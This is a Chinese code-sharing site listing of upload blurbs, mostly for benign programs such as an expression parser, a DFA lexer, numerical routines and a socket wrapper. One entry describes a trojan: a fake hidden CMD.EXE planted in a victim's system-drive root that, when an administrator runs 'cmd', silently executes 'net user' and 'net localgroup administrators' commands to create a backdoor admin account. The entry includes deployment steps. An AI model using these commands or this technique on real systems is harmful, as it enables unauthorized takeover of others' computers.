该类有以下特点: 1.支持字符串中含有各种常用函数,如"7.5+sin(6*ln(8))/exp(5)" 2.具有很好的纠错能力,能检查出表达式中括号是否配对、库函数是否正确 3.运算过程中能检查并判断出各种异常,如除数为0、开方函数sqrt(x)中x<0,反余弦函数acos(x)中的x<-1或x>1等 4.支持积分、求方程,算术表达式中可含有x,计算时将用类中的成员变量xx代替
上传时间: 2015-01-11
上传用户:aix008
词法分析的程序。核心函数是一个状态切换的函数 CAjaxParserDlg::Route。状态切换函数解根据一个 DFA 来对输入的文本进行分析。也就是说,如果你做一个新的DFA,就能分析新的词法。 DFA 的初始化在CAjaxParserDlg::OnInitDialog。
标签: CAjaxParserDlg Route 函数 DFA
上传时间: 2014-01-10
上传用户:qilin
用BP网络完成函数的逼近源程序
上传时间: 2013-12-13
上传用户:jing911003
它对bekerly标准socket的库函数进行了简单的包装,使标准函数的调用更加直观。
上传时间: 2013-12-23
上传用户:hongmo
特征值和特征向量的计算,每种算法都用c++以函数形式实现
上传时间: 2015-01-12
上传用户:小码农lz
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
上传时间: 2015-01-12
上传用户:qlpqlq
运动目标位置预测
标签: 运动目标
上传时间: 2015-01-12
上传用户:hopy
遗传算法的函数优化sga
上传时间: 2015-01-12
上传用户:zyt
W32API函数说明
上传时间: 2015-01-12
上传用户:zuozuo1215
本程序封装了一个加解密模块. 使用时直接调用其中的函数即可.
上传时间: 2015-01-12
上传用户:ikemada